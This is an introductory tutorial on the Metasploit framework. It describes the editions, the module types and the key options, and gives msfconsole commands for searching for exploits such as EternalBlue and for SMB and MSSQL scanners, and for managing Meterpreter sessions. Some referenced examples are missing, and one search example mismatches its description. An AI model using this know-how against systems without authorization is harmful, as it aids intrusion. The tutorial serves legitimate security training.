Metasploit is a multi-purpose computer security and penetration testing framework. Intentionally modular, it allows the attacker to mix and match scanners, exploits, and payloads into a single attack. Originally created by H.D. Moore for security analysis, it was later acquired by Rapid7, which added more intuitive, GUI-based commercial versions. Metasploit is considered to be the de facto exploit development framework. It is used worldwide for both legitimate security analysis and unauthorized activities.
Metasploit currently comes in three editions:
- Metasploit Framework—the free open source command-line version (installed by default in Kali Linux)
- Metasploit Express—a simplified commercial edition for security professionals who want to validate vulnerabilities
- Metasploit Pro—a full-featured graphical version that includes Quick Start wizards, easy vulnerability scanning and validation, phishing campaigns, and reporting
In addition to the Rapid7 projects, there are two popular GUI-based spin-offs:
- Armitage—a GUI for Metasploit framework created by Raphael Mudge
- Cobalt Strike—a commercial version of Armitage with advanced features and reporting
Metasploit's features are organized into modules. There are six basic types:
- Exploits—attacking software that delivers a payload
- Payloads—code that runs remotely
- Post—additional tasks you can perform on a compromised host
- Auxiliary—scanners, sniffers, fuzzers, spoofers, and other non-exploit features
- Encoders—ensure that payloads make it to their destination intact and undetected
- Nops—keep payload sizes consistent across exploit attempts
Each type has many modules inside, grouped by sub-type or platform. When using Metasploit, you specify a particular module by its path. For example:
You launch Metasploit Framework by either selecting the MSF launcher on the Kali desktop toolbar or by entering msfconsole in a regular terminal window. Once you have specified the module, you usually have to set options. Some are required and some are optional. Examples include:
- RHOSTS—(remote) target names or addresses
- LHOST—attacker ("listener") address
- RPORT—target port
- LPORT—attacker listener port
- SMBUser—a user name for SMB-based attacks
- SMBPass—a password for SMB-based attacks
If you are using an exploit, you will also need to specify the payload. The payload is a program that runs on the target once it is compromised. The most popular payload is Meterpreter, which is an interactive, menu-based list of commands you can run on the target.
Note: The quickest way to determine the correct module, payload, and options is to conduct a Google search. However, be advised that Metasploit is frequently updated. You are likely to find examples and instructions that are outdated and no longer work.
Searching for and Using Metasploit Modules
Both Metasploit Framework and Metasploit Pro allow you to search for and select scanning modules. Armitage and Metasploit Pro both have a convenient GUI interface that many find easier to use. You can search by a number of criteria, including a simple string (the string can appear anywhere in the name/date/rank/description), cve #, platform affected, application (client or server), and type (exploit, auxiliary, payload, etc.) You can also specify -o <filename> to save the output in CSV format. It is not case sensitive.
Find every exploit that refers to EternalBlue:
msf> search EternalBlue type:exploit
Find every exploit that applies to Windows XP SP3 and save to xpsp3_exploits.csv:
msf> search platform:"Windows XP SP3" type:exploit -o /root/xpsp3_exploits.csv
Find every VNC payload that applies to Windows:
msf> search Windows/VNC type:payload
Find every exploit that can be used against Microsoft SQL running on Windows:
msf> search Windows/MSSQL type:exploit
Find all Windows-based SMB exploits that have an excellent (most reliable) ranking (have the string "excellent" in the row results):
msf> search Windows/SMB type:exploit -S great
Search for every scanner that has to do with SMB:
msf> search scanner/smb
Search for every scanner that has to do with Microsoft SQL:
msf> search scanner/mssql
Scanner Usage Examples
Once you have found a module you would like to try, use the search results to give you the path to that module. Load the module and then show its options to configure it. Enter run or exploit to launch it. Remember that post modules can only be run within an existing Metasploit session, after you have already exploited the target. The following example searches for MSSQL scanners, then configures and runs mssql_ping. This module scans a host/range for any machine listening on UDP 1434 (likely to be open for any MSSQL server), then tries to determine the TCP port (default or not) that the Microsoft SQL Server is using.
Here is an example search for MSSQL scanners.
Meterpreter Session Management
You can have several MSF/Meterpreter sessions running simultaneously. Here are some syntax examples for managing them:
Press Ctrl+Z to put your current session in the background.
List all of the sessions you currently have running:
msf> sessions -l
Switch to session #2 Managing Meterpreter sessions:
msf> sessions 2
Here is an example of managing multiple Meterpreter sessions.